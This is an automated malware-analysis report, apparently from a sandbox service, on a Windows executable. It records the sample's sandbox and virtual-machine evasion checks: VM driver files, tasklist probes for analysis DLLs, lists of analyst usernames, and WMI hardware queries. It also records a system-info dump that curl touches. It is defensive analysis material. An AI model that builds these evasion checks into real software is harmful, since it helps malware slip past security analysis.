Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F412AA60 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex,0_2_00007FF7F412AA60
Source: 9KEZfGRjyK.exeStatic PE information: section name: .padding
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Contain functionality to detect virtual machines
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\0_2_00007FF7F4102720
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel /mtasklistsandboxusertestadminroot0_2_00007FF7F4108B20
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel 0_2_00007FF7F41142E0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel 0_2_00007FF7F41284D0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel 0_2_00007FF7F4101000
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model, Size FROM Win32_DiskDrive
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: tasklist.exe, 00000016.00000002.1756477526.000001CD45DC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: API_LOG.DLL:\US
Source: tasklist.exe, 00000012.00000002.1743875843.00000294AA700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL:\US
Source: tasklist.exe, 00000016.00000003.1755468629.000001CD45BFC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000002.1756308730.000001CD45BFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: API_LOG.DLL
Source: 9KEZfGRjyK.exeBinary or memory string: DIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOMPUTERSYSTEMGETMODEL
Source: tasklist.exe, 00000012.00000002.1743616105.00000294AA550000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSTEM32\TASKLIST.EXE"TASKLIST" /M SBIEDLL.DLLC:\WINDOWS\SYSTEM32\TASKLIST.EXEWINSTA0\DEFAULT
Source: tasklist.exe, 00000012.00000002.1743616105.00000294AA550000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M SBIEDLL.DLL
Source: tasklist.exe, 00000018.00000002.1760804705.0000022FD3AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M DIR_WATCH.DLL
Source: 9KEZfGRjyK.exeBinary or memory string: DBGHELP.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOM
Source: 9KEZfGRjyK.exeBinary or memory string: SBIEDLL.DLLDBGHELP.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARA
Source: tasklist.exe, 00000012.00000002.1743730357.00000294AA58C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1743068542.00000294AA58C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MSBIEDLL.DLL
Source: tasklist.exe, 00000018.00000003.1760070471.0000022FD3B19000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000002.1760957579.0000022FD3B1B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1759944569.0000022FD3B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MDIR_WATCH.DLL
Source: tasklist.exe, 00000016.00000003.1755468629.000001CD45BFC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000002.1756308730.000001CD45BFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MAPI_LOG.DLL
Source: 9KEZfGRjyK.exeBinary or memory string: API_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOMPUTERSYSTEM
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422724790.0000026594338000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - DIR_WATCH.DLL
Source: tasklist.exe, 00000016.00000002.1756477526.000001CD45DC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MAPI_LOG.DLLOWSTEMP
Source: tasklist.exe, 00000018.00000003.1760070471.0000022FD3B19000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000002.1760957579.0000022FD3B1B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000002.1761093661.0000022FD3DF0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1759944569.0000022FD3B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DIR_WATCH.DLL
Source: tasklist.exe, 00000016.00000002.1756212113.000001CD45BB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSTEM32\TASKLIST.EXE"TASKLIST" /M API_LOG.DLLC:\WINDOWS\SYSTEM32\TASKLIST.EXEWINSTA0\DEFAULT
Source: tasklist.exe, 00000012.00000002.1743730357.00000294AA58C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1743068542.00000294AA58C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: tasklist.exe, 00000016.00000002.1756212113.000001CD45BB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M API_LOG.DLL
Source: 9KEZfGRjyK.exeBinary or memory string: SBIEDLL.DLLDBGHELP.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOMPUTERSYSTEMGETMODEL
Source: tasklist.exe, 00000018.00000002.1761093661.0000022FD3DF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MDIR_WATCH.DLLTEMP
Source: tasklist.exe, 00000018.00000002.1760804705.0000022FD3AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSTEM32\TASKLIST.EXE"TASKLIST" /M DIR_WATCH.DLLC:\WINDOWS\SYSTEM32\TASKLIST.EXEWINSTA0\DEFAULTJW
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422724790.0000026594338000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - API_LOG.DLL
Source: tasklist.exe, 00000012.00000002.1743875843.00000294AA700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MSBIEDLL.DLLOWSTEMPK
Source: tasklist.exe, 00000018.00000002.1760804705.0000022FD3AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M DIR_WATCH.DLL.W
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422724790.0000026594338000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - SBIEDLL.DLL
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeFile opened / queried: C:\windows\sysnative\drivers\vmhgfs.sysJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeFile opened / queried: C:\windows\sysnative\drivers\vmmouse.sysJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT IdentifyingNumber FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F411EB20 CloseHandle,FindFirstFileW,FindClose,0_2_00007FF7F411EB20
Source: getmac.exe, 0000000D.00000003.1734488419.000001DBD421F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734307321.000001DBD420C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD4221000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
Source: system_info.txt.0.drBinary or memory string: - vboxservice.exe
Source: tasklist.exe, 00000026.00000002.1789577137.000001D7126C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxtray.exe"wk^D
Source: 9KEZfGRjyK.exeBinary or memory string: VBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: Paul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000003.1734488419.000001DBD421F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734307321.000001DBD420C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD4236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
Source: tasklist.exe, 00000024.00000002.1787805517.000002173DA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: C:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422724790.0000026594338000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - vboxtray.exe
Source: getmac.exe, 0000000D.00000003.1734488419.000001DBD421F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734307321.000001DBD420C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD4221000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: 9KEZfGRjyK.exeBinary or memory string: malwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: C:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: testadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000002.1789577137.000001D7126C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'
Source: tasklist.exe, 00000026.00000002.1789577137.000001D7126C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\tasklist.exe"tasklist" /fi "IMAGENAME eq vboxtray.exe"C:\Windows\system32\tasklist.exeWinsta0\Default3k^
Source: 9KEZfGRjyK.exeBinary or memory string: workvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000002.1785611901.000001F9D2F90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\tasklist.exe"tasklist" /fi "IMAGENAME eq vmtoolsd.exe"C:\Windows\system32\tasklist.exeWinsta0\DefaultA
Source: 9KEZfGRjyK.exeBinary or memory string: dekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1787805517.000002173DA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vboxservice.exe
Source: tasklist.exe, 00000022.00000003.1785291291.000001F9D2FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: , ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'0
Source: 9KEZfGRjyK.exeBinary or memory string: analysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: XENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: vmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: pstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: usertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: dbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcom
Source: 9KEZfGRjyK.exeBinary or memory string: dir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
